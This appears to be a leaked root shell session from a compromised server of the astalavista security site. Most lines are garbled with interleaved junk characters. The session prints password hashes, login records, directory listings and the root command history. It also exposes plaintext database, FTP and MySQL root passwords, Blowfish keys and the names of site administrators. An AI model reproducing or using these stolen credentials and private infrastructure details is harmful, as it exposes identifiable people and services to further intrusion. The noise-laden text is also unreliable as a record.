) I, {2 x* r& pcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::- t1 r; l* n1 X( Q# C
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
M/ y6 n; `! \9 J1 t/ H2 E7 b {+ _5 d5 _& E
sh-3.2# cat /etc/motd+ L" @- \0 @$ \
#####################################################: ~8 _3 x( g* N% ~( O7 V. m
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #! H# J2 i4 P# m# v
# |__| [__ | |__| | |__| | | | [__ | |__| #
. U& d2 B% P3 D/ L# | | ___] | | | |___ | | \/ | ___] | | | #
, X" D \. _( T t- W5 ~- @# #
3 f$ j3 z! o* p# Q5 \7 b3 C+ B#####################################################
7 G$ C6 q2 x, Y; W! z# #( u$ X) d, G$ _: l$ L$ ]
# Admin Contact - 链接标记support@secureservertech.com #
! u6 e. v# l8 F$ A" I, P* k8 {# #4 M6 D# ]7 G! t3 r
# Available ShortCuts #! n; Z( V) k/ S2 ^) e7 v6 m" _
# #
7 ~4 O- r. c$ i' `/ u$ O7 T( N# nst - list active connections #
. `6 m% Z8 d0 V7 M% ^# ddos - shows how many times each ip is connected #
& {* r X( s( _% }& _5 m& G# ltr - restart the webserver #
2 L6 ]8 _* B8 K/ k% \4 u# phpc - edit the php config file #/ M) l) G, R S/ m2 E
# htc - edit the webserver configuration file #
[- n! L2 r% R; @3 I$ j# up - uptime #0 M, b: {2 n8 T
# etd - edit the motd of the day file #
% ? t2 P( ~8 o9 s# htr - start and restart apache if needed #/ f1 n$ ^- ]' g) W% I$ v5 k
# syng - shows active SYN_RECV connections # h# R# g$ S9 [0 D5 v6 W
# synd - syn flood blocker - “synd -h” for usage #
/ S" }8 ]# \" L, e: n#####################################################
/ T8 a+ u- w/ q1 F. n, d# NOTES: #5 k. j7 A4 f2 B9 C
# Last Upgrade - 12-08-2008 by JF #; l# b0 O: ]% T6 T! X/ H3 u2 s; c
# My.cnf/Mysql Optimization - 1-28-09 #, w0 r: j# P$ _1 H
# #
6 ~! H9 H. H) l! G3 q) i9 G; a/ u# #
+ `# o( k; a+ Y# #
& A" D! [" i7 m#####################################################9 ~& k* {0 k9 f+ U/ P* s
# e& F( G; T1 D0 d7 K2 I" ssh-3.2# lastlog | grep -v Never/ O8 _; J; h L1 `, u3 N& K( m
Username Port From Latest
8 j; V0 `$ k+ q1 qroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009# f* [/ a3 v8 E& v* b
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008, V B4 E7 E/ s9 J @0 q+ \8 V
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
[* O* u* I; }7 ~+ Iastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
7 {7 G5 m: T. J/ I0 S/ s2 _7 `6 \/ W5 I
sh-3.2# ls -la
1 O: g3 x6 }1 l+ y, ptotal 453376, c( `* D) s5 @$ F7 m4 K! n3 j
drwxr-x— 15 root root 4096 Jun 4 08:40 .( b' a: F+ S5 S' e# E0 l3 R4 t
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..; n. C( P4 V! j( {
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
; w& ]5 s5 ]5 a7 h% C-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg' y: s' V, j' ~; H$ `
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history1 [. T0 V6 P p6 f7 S# s, E
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
& ~! y3 S5 U8 s7 R% J4 m-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
3 c i( J. D$ R; H-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc6 n* M6 v; j/ U: ^% d3 c$ p
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
; n0 P4 ^% j: _% [7 q1 b-rw-r–r– 1 root root 1327 Nov 29 2007 cert! J- Q( }# K$ u& o$ @
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql# ]" P6 u+ R+ W( w( L
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
- c7 ?0 _# I' N ?3 J& u7 A9 v6 t-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc9 I9 D+ r5 u4 s5 C8 B, k5 _
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql `) B2 y+ B3 H' H* Q7 ~/ d
drwx—— 2 root root 4096 Oct 28 2007 .elinks6 o- R# L6 a6 F( ?. C' }/ o
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- Q+ r- r4 O& }# D5 _/ E-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2) Z' f5 l# ?: D/ C
-rw——- 1 root root 0 Apr 16 13:19 .history
# \, A# O3 C& g1 z* Y-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
* i6 z% w7 D& R7 H: G0 s-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog: Z! D: n8 H7 x, D& N% n T
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
8 s/ @8 }/ V9 W& V-rw——- 1 root root 35 Jun 2 14:23 .lesshst2 ]1 s# [0 G' s% q5 B
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp" f5 ^) x6 x% E# m8 _" m
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec2 U4 N1 S2 ~+ K
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz2 J8 k# z$ h6 v
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
* V2 h9 n, {2 W6 z-rwx—— 1 root root 760 Sep 18 2008 lp9 T$ b( x, p5 v) e" h, j
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
# w2 E- z; h9 Q4 G-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
+ ~* v: t! e _8 W8 j4 K+ Y-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1) [$ j3 E' J1 {. q; O
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9* @5 p) p6 b- D9 I u$ K |1 j
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
! a# u1 n7 o7 D9 D$ [2 jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
. b: l# _- p# F# T. r-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz, U2 v$ `' E6 e. h7 r- O3 ]2 k9 y
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh8 c; |3 s" l A
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
; P; W* H) B& K3 ?# v7 d-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history$ Y3 ]. r F" T5 n; A3 T% y
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
7 s! L6 |5 g7 Y3 D-rw——- 1 root root 41 May 20 2008 .mytop
/ |+ d) q! J B. Hdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
' K- ]; X+ @) I-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz6 k+ w- h3 y P$ A
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp( _% G( n) Z M% _0 s o" H! `
-rw——- 1 root root 1462 Sep 21 2007 opt.php4 B q: r$ I3 M7 E3 u5 V4 b
-rw-r–r– 1 root root 3371 Sep 22 2007 p
2 D: v6 M7 k/ t: G1 N-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz25 n. r5 O& i( Y D6 ^
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
2 n" n2 y! ^3 D s: q-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) z- T$ c# o: k+ q" ~! `" z9 X/ y-rw-r–r– 1 root root 887 Nov 28 2007 server.key
9 A3 j L& `) d6 ~" i- B7 I( mdrwx—— 2 root root 4096 Oct 10 2008 .ssh" @) j5 I1 Y M
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
, e' p, N; Y; s0 `" ]-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
6 z& m* L( C/ W2 U% |% {% I-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip7 _$ j3 J: j: U7 w9 z
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
/ ]) q+ j& v- V# E% x9 Idrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp, g+ b* ]% C5 _0 b& Z9 d; g t. }
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
6 o$ v' d, f" \1 C/ ~ jdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
6 u, T1 {2 x6 f& V-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2$ B+ m% w$ p2 [: d8 ]3 {
-rw——- 1 root root 12997 May 16 2008 .viminfo0 a9 Y9 e) ^8 u5 V, k4 r, `
; q' D$ N: W0 i6 k9 Jsh-3.2# cat .bash_history) i9 {* Q" }6 W" ]9 N1 o( ~& i# `
[snip]( Q; S3 p" X* @# s. {
wget cp4sst.com/sstlinux.tar.gz! j# T: v6 _5 m. G# V k, p/ ?/ I. F
tar zxvf sstlinux.tar.gz- }2 e. `8 ]0 a- l
cd linux-2.6.27.102 F1 Y4 v5 }; w n
sh install.sh
: K5 i$ o0 @. h! V$ Gmake bzImage ; make modules ; make modules_install ; make install
* E$ t& m; h5 |/ t: e; rmake clean0 J2 y" n9 ?& X* @- [7 ?3 A5 V
service mysqld restart
5 k# G6 O- f0 Z: p) p1 H) E[snip]1 p- b/ k# d3 }) K
cd /usr/sbin/
# |# o7 L# m, _3 l3 F( ochmod 4777 traceroute2 D2 s$ F: y9 m: G
chmod 4777 ping
, L8 x: D/ v5 I1 \( q3 X; n. K9 jtraceroute -I 链接标记[url]www.astalavista.ch[/url]& z, @2 `- j$ x
[snip], U* v4 @2 U2 M1 g: d2 O/ V
vi /etc/csf/csf.conf! V& A/ E/ b. H1 e3 |+ {
traceroute google.ch
# g7 ~9 z! I7 k v4 oservice csf restart# `# w8 }3 E7 K3 ?0 _
tracert google.ch+ k$ G( T- N( H
service csf restart/ e6 X+ A0 p! E; H
traceroute 链接标记[url]www.google.ch[/url]
! _: @' O' Q2 s. ttracert 链接标记[url]www.google.ch[/url]4 C0 {: G7 t& E* T% M9 x
traceroute 链接标记[url]www.google.ch[/url]9 u! N' D4 l) i! J
locate traceroute
! }& B' d% {5 o6 @" F6 ?8 \/ @chown 4755 /bin/traceroute
$ v# E+ P3 S$ M! b1 m% F5 t e; _chown 4777 /bin/traceroute" m3 k8 ~- T4 z7 A. {
locate ping
' |8 Q4 m( u3 O; xchown 4755 /bin/ping
8 t) ?4 X% M8 t7 {5 _% L4 |chown 4777 /bin/ping D g( W+ R- Q: m& B! l
cd /bin/& o& p3 G6 B% q5 H. X' m
ls -ali | grep ping5 u4 W. ]+ d2 V" _2 U8 f
chown root ping
6 j: u! ^2 Y& \) ^0 s3 z! |) w. z8 G& Vchmod 4755 ping
; j" J7 Q& N7 Yls -ali | grep traceroute
- |! C% G& W5 d$ U( Qchown root traceroute* L' }; Q) u* `) {, C7 d
chmod 4755 traceroute' Z6 m K& q! u( H
ls -ali | grep traceroute4 d" g, t! I/ J* o
traceroute -I 链接标记[url]www.google.ch[/url]9 f S. _" A: K
traceroute 链接标记[url]www.google.ch[/url]
; b a* n% ^. |* \6 H8 P* J0 y0 ywhois pmsantos.ch
Z, Q5 R0 X' W9 R[snip]
9 s: S0 e0 r3 Wmysql -h com_contrexx2_live < /root/defaultp_ports.sql
* K2 m: Z2 z/ c7 \" Amysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql, {8 Q* _5 m0 A
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql# |7 x" ^- s4 B' S
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
, w: i/ n* i: v3 |5 d3 H5 m1 C% ]top! M* W9 q% c5 v
ping ssth.ch
& l0 V/ U% k$ z0 Z* I; _ping asdlkfaljgasd???ljg???lasj.ch' S8 L2 E4 W$ M! R3 k, t, E
ping asdlkfaljgasdlasj.ch
4 B. w8 p' [. ]- u0 uping 链接标记[url]www.ssth.ch[/url]; B7 a8 O1 o+ E1 Q
ping ssth.ch% n3 `/ ~) R8 K0 S
nslookup 链接标记[url]www.google.ch[/url]1 o. Z, p" n. D$ O% N
nslookup 链接标记[url]www.ssth.ch[/url]8 |' G/ `' M/ `/ F! w/ `4 M1 U
man nslookup5 d" I/ R# b2 \+ q% a8 c- v
ping 链接标记[url]www.google.ch[/url], H1 P, I9 P: |+ u
nslookup 链接标记[url]www.google.ch[/url]- Y1 t' L( A* y6 P
nslookup 链接标记[url]www.google.ch[/url]
8 y7 w# p) L: u7 Z: Q6 U$ i1 v5 lnslookup salfjasdlf.ch9 q2 x: ?0 [% J) T8 @9 c
[snip]; | s+ w5 ~7 Q# j1 o
openssl passwd -1 sadf
! F# H; s( F: Kopenssl passwd -1 5cZNHstdTy
( f, S- _8 k3 i( ^/ ?: qmysql
0 Q, ?) C& o; ~3 _ g! O" G$ ymysql7 G$ {5 I( h4 ^4 S) T( o* O* ]6 m
locate proftp: I% |+ @ F S
vi /etc/proftpd.passwd
7 g% g- o1 r: U+ Gservice proftpd restart/ z; D3 z% _& Y4 I
locate proftpd.conf6 \- X+ @$ j9 g6 h) {: C( R4 t) G
vi /etc/proftpd.conf; h' e4 l# [' G+ ?3 p
vi /etc/proftpd.passwd1 y; G- [2 v9 P9 b" Z* R8 i
service proftpd restart! v7 I+ N- |0 e) V
[snip]- S; W2 K; w; V$ y2 j' G- x. x9 N+ b
/bin/sh /home/com/backup_system/backup.sh
& Q# z0 J5 p utar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
8 T* e6 t8 H" U: ]* m2 K1 zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql% }6 X5 b1 l. L- l7 p& `) T
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql/ i; {" T" L& C6 S( S0 t" l. h
ls -ali
) `1 L. B3 {% y# ?, cmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql, C8 a! f* H; Q3 x
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
0 T( I$ w/ V$ u0 R4 {, G; j: }2 i: Zcrontab -l
& N! j$ V# t% Ycrontab -l
: t8 N- {, k9 ]php -q /home/com/public_html/modifications/cronjobs/securitynews.php
' ]4 `0 w& q$ t1 \( G4 @# J0 v& P: i/home/com/public_html/modifications/cronjobs/exploits.sh
% e8 x" |. v9 X* [, c( {wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]4 d* R' O7 l) y. r) K
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz* p! o% B; v- w) W( X
cd lsws-4.0.3
% E+ M+ |. M q7 Ush install.sh; q, J; L- D; e
uptime4 v- V2 j/ k" o; i0 d
hdparm -tt /dev/sda
; E9 v! o' J1 Kiostat
6 t/ e$ r6 \6 x9 L! |yum install iostat4 J# }: u. ^3 r7 S# m
iostat. x1 X1 l$ R$ n" a5 E- q; S
whereis iostat
) s/ W- P; D5 T; xyjm clean all) ]0 p8 z- J+ X1 T8 ?: Y
yum clean all ; yum -y update
4 p5 G6 T/ _7 U5 ^! q% ^iostat
7 c/ ~1 u+ {- P% X: Lyum install systat
, Z; l; `1 a9 ?/ `( @) Y# Rrpm -qa | grep iostat1 F6 Y, I5 d# g3 T! q
rpm -qa | grep sysstat8 d, d) ?) g, }6 o4 }/ q+ M
rpm -qa | grep systat
- Z4 V- [ M/ W) @3 P3 m& l7 ?dmesg -c, _3 h- v- @1 H
sysctl -p) i. F5 j2 U* y$ X+ D; ?. j" k
uname -r
# Y0 Y; U: Q5 e( R7 |cd /usr/src; L+ Q4 J2 `, d4 }+ i6 S
wget nix101.com/kernels/sstlinux.tar.gz
: ]; B. b# O* H& d6 Gshutdown -r now
U3 S T; W7 ~% F7 Ynano -w /boot/grub/grub.conf9 m: i2 o: K& ]
# P3 C( u5 I' w5 |! N. d
sh-3.2# cat .my.cnf" x& s8 j$ O' z9 ~& w
[client]# _4 [# D$ b5 [3 N4 P
user=da_admin
. p6 n5 v3 Y3 T2 j/ ?: lpassword=X9dctmRH4 D+ b- z) f" G* x6 U1 B
6 Z7 Z! ` j2 i( Z% h
sh-3.2# cat /home/com/backup_system/backup.sh
; U+ M% s: i! N; o1 r6 V#!/bin/sh* c7 N6 C; W6 _! U8 O$ }
#####################################################################
; h8 t" \/ }" I; j9 {# #0 V5 I4 ?7 V7 c3 J( l2 E
# incremental backup for astalavista.com #
- Z- G' t8 _! Y' y- F# #' K: s5 f+ e* z* h' h1 q
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #! |/ v; {3 `6 b0 u( y' z$ |
# #* }4 ]. `0 U# B+ I
#####################################################################
/ J7 J* d! `8 [3 I% u/ z[snip]- T. h4 Q' m2 [: _
PROG_DIR=”/home/com/backup_system”;/ U( |/ b; X. u5 r9 a, [: ~- {
BACKUP_DIR=”/home/com/backups”;
! |0 e& n4 n H5 \$ \DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
/ t+ b. _/ n! ~( }) ~# c# ftp for synology backup server
8 Z* G8 e; d" AFTP_HOST=”212.254.194.163″;/ W$ g8 N9 [4 S4 F8 ?- G S
FTP_PORT=”21″;0 H& ~1 w# y. B# U( z2 ]
FTP_USER=”astalavista.com”;
9 S: Z& o) d/ W( j# X; HFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
1 g5 C# h' l. h, h ]+ ?4 j) p$ ZFTP_DIR=”/astalavista.com”;) B2 @" e2 X2 S" P3 g: u6 I* L
# database% ~3 U% |5 n2 V' X7 ^; t
DB_HOST=”localhost”;# Q7 C/ V3 z$ B3 R5 E
DB_USER=”contrexxuser2″;
* \& V+ u* ^2 \: aDB_PASS=”0fEYNZgXz1pKe”;
! ^/ n$ _; C( \- [DB_DATABASE1=”com_contrexx2_live”;
, l3 g) G3 Q5 E7 J/ h f7 u1 W: R" rDB_DATABASE2=”com_contrexx2″;
( F* Q' \9 d# r# |[snip]
6 c' I; X! K1 [8 x2 Kftp -in $FTP_HOST $FTP_PORT <<EOF7 h6 ]9 J) A# ~, r/ P. D
quote USER $FTP_USER
! }4 ]% ]0 [: z* ^9 p! Q( Lquote PASS $FTP_PASS
5 E( X, ~3 g6 E4 j% j& h& V+ }cd $FTP_DIR9 e1 u' j% ]2 D- e W5 k, R
put $DB_FULLNAME-SQL_Dump.tar
; B# [* m% {9 E4 p3 B7 |: uput $BACKUP_FULLNAME-Public_HTML.tar
+ q* j( Z8 V3 M- Wclose) w9 x+ W2 v3 h- I; v+ ]
bye
% P4 g7 x9 e1 vEOF) _( y& }$ p; d1 g% N# {
. q4 z1 V3 o6 w! C. o2 v2 r, Vsh-3.2# cd /home
6 v9 e) t! s- g# p; u! Tsh-3.2# ls -la
& T3 F$ g" L3 Y- `6 c {total 1205 e b6 u4 t" r* L0 Q* Y- s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
( D7 f& v) D0 t+ U6 t w* ?drwxr-xr-x 25 root root 4096 Jun 3 02:43 .., S7 H" \! J# j( i: J6 J/ T
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
6 u: W( I0 I7 @0 [3 V-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( J( j- e$ q) S
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
! b& ]7 K' L% c+ Z8 n$ udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet0 M) _7 g) b H4 s
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup2 D5 b" B# {. b' `# p% ^4 I
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141618 s& V" a; `: r( Y
drwx–x–x 10 com com 4096 Apr 28 12:40 com
5 ~: Z8 a& \) N r) T% gdrwxr-xr-x 2 root root 4096 May 17 2007 ftp8 Q" \3 |2 e6 s9 \) a
drwx—— 3 jon jon 4096 Sep 21 2007 jon
# w3 m: d/ o2 ?. k! \4 xdrwx—— 2 root root 16384 Sep 11 2007 lost+found
1 T+ [* V' ~. kdrwxr-xr-x 2 root root 4096 Sep 14 2007 my. X2 P6 A+ T7 G) ~
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
, F9 i& m& I7 `. e( P1 u+ a: \drwx—— 2 jon jon 4096 Sep 15 2007 test
0 W7 M* \& h' [, H& t9 J3 z. bdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp9 N0 w! M) N' ~1 T! E) K7 c
/ o; S+ o1 y! _0 T5 h9 f5 t
sh-3.2# cd admin9 O$ @6 g" O/ c. t2 q# i
sh-3.2# ls -la
7 m, c3 n D n# ?. d7 O5 t& Itotal 1735896
0 e# P$ x& j$ O6 M- i' a' p9 [drwx–x–x 9 admin admin 4096 Nov 28 2007 .
/ V7 |3 m8 U, R# ]8 |& h& F6 s9 gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ f+ y+ j; v. t$ r
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups# p6 `+ c4 {7 z0 j* w
drwx—— 2 admin admin 4096 Sep 28 2007 backups# T8 b8 Q' j) N4 M
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
D( D5 [2 S9 H% a-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
% N6 O$ D( h% {5 Y' a) C. @5 E5 \+ w-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
: \# M+ I1 ?' N7 T Y* Q- g; C-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc0 {" S8 j8 k/ x$ X$ k
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
; E. J3 I G6 h3 j3 Mdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains4 N3 x `4 P3 H2 y& ^
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap4 d: U/ `' Y/ ~. W6 H
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
3 D, B; p' L% R) V& K; Idrwx—— 2 admin admin 4096 Sep 21 2007 mail
9 A; M( n: p R/ S# T-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& C2 a9 d* Z1 r @, O; R
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
* b) B% K, k. W( I# L; c( J-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow# i+ }/ L! U, f8 c. D
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz n, Z0 {! ?5 a, K! c E h# f
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups/ }" j6 Q. b! @: _: h
* H. L3 ?; D1 P$ v+ w
sh-3.2# ..
. t+ [3 C! U) F- Z# g% csh-3.2# cd jon# h+ l% m. T2 j5 R
sh-3.2# ls -la
$ _9 X3 e- u2 y& A& X& v+ q) Ztotal 36
. ]3 z1 o; P- A. ~. s6 K& odrwx—— 3 jon jon 4096 Sep 21 2007 ./ P# _1 X( ?! z% j" O4 X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ r, l6 T$ x! c8 w5 R4 d) F' F" K
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history- ^) M* F: n4 r9 V G/ i. f
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
1 v9 o# c$ v f4 Y! p) ?9 F-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile, ]7 j7 s; q; |3 _: H
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc) s- P4 L& t) ?# k5 {# z6 B
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
9 \, O* {& m9 S! y, h( ]drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html: ^! B c' ]' N; o
5 f: c) l' ^2 p% S! z8 g6 n$ p
sh-3.2# cd ..
( L* w7 b" ~' s* _% p! ysh-3.2# cd test& T; x! | E- W0 A/ ?
sh-3.2# ls -la% M# X7 i. A W. J; [# C0 [# a" H
total 48
0 U) p6 H8 i4 ^; Y% R4 ] X3 Pdrwx—— 2 jon jon 4096 Sep 15 2007 .
- I. \2 S9 f" {" B9 `4 Y3 Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 M1 g' H4 K) q4 D" H; e$ Z5 M
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
1 K! [( _2 F$ F" e9 e-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
: _9 l; ?9 D6 Y" g( W& L+ ?9 l w3 F-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
9 g% E- P! H% P% A6 c-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
1 a: E8 C( K8 x' I7 X( Ish-3.2# cat .bash_history
. U+ E9 ?6 s4 k' n+ r9 X, m9 Y7 a1 B/usr/bin/mysqladmin -u root password PoliuJhytg67+ f0 c) ^0 y( h4 _- h7 q1 l
4 K6 P5 U4 |; Y! _5 Y1 {sh-3.2# cd ..
1 h, {# j6 Z3 L8 S# ~" tsh-3.2# cd astanet2 [4 u( \) p* f
sh-3.2# ls -la
& ]3 ? Q! ]0 w; B! _total 52- U% @2 o: h1 D$ v7 e; n. o3 G
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ./ L6 E( f( [! Y5 F8 ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 ?9 B D: [( @7 c5 cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* o& C) H$ a- f
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
+ ~/ s. R* n, Q n- {; Z9 a-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
" W/ A b! { b* }+ M1 f! O-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile* i" ~0 F* C- ?. j5 o1 G
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
% o G" @2 a# q$ K& ~* Zdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
. z% W m$ w7 T! u/ ?3 Gdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
9 `2 u" e; ~- Y: ]drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
" {3 I( K! \1 K5 v, M' [8 w-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history5 I% w9 g( a7 e$ j) @
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
, V! w, }. o$ ~/ m-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
( @1 g" O+ f# Z5 o6 x" `/ n4 s; l1 m1 Q' p k
sh-3.2# cd auth/
/ w6 V2 B) W6 ^. R8 V. xsh-3.2# ls -la
# e; c1 V! g2 n) \8 mtotal 28
5 E1 O' s/ {& m: |: u( m+ \( wdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .8 @9 R# f# k6 e5 [) _- p
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..% r( p$ j( v9 ~5 w U' Q- y8 c
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
7 M3 c- Y7 L0 n$ d( @# H* W-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php% L! [/ e/ e+ F7 N
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
3 e) |; T% A8 e6 S0 w-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
' r6 x3 H% u$ ^( p6 Z/ F5 q/ l-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
7 F, b, w3 v" U- e2 ~* b+ ?' q; k' {( ^1 i& q" |$ n' Z% y
sh-3.2# cat hackercontest.config.inc.php/ I5 }( ^" \8 R# f/ u& v
<?PHP9 v2 `* B+ M% I6 `0 `! d
// Variabeln f?r Verbindung zur Datenbank //
" E% B2 q' L: j$ J$conxHost = ‘localhost’; // MySQL hostname
/ c) t3 L- f. d# e# n/ G$conxUser = ‘hackercontest’; // MySQL user
" V' o! L1 V6 [! T) M# T$conxPassword = ‘K6m@7dUc’; // MySQL password
) ~6 H$ Y) \4 J: Q. E1 ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
4 ^ x/ R' i5 R6 j& ~; F?>
" `; \# a# O) `' ^2 lsh-3.2# cat hosting.config.inc.php
- `4 Y5 x) Q7 T" y) @0 o<?PHP
/ d- b7 W c- X9 g' f0 t" K// Variabeln f?r Verbindung zur Datenbank //4 b9 y" K$ X( j+ [% |
$conxHost = ‘localhost’; // MySQL hostname
2 f7 G* b! Y# h4 \$conxUser = ‘hostinguser’; // MySQL user
5 I- V! G0 v B$ j$conxPassword = ‘cXvB3981′; // MySQL password
4 `9 J. [( k4 l8 w$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
8 f5 p( v, L9 Y* i- K' A?>, p- A) @/ K# M
# ?$ ?$ }$ C8 {" `9 _( V* `) ?sh-3.2# cd ..
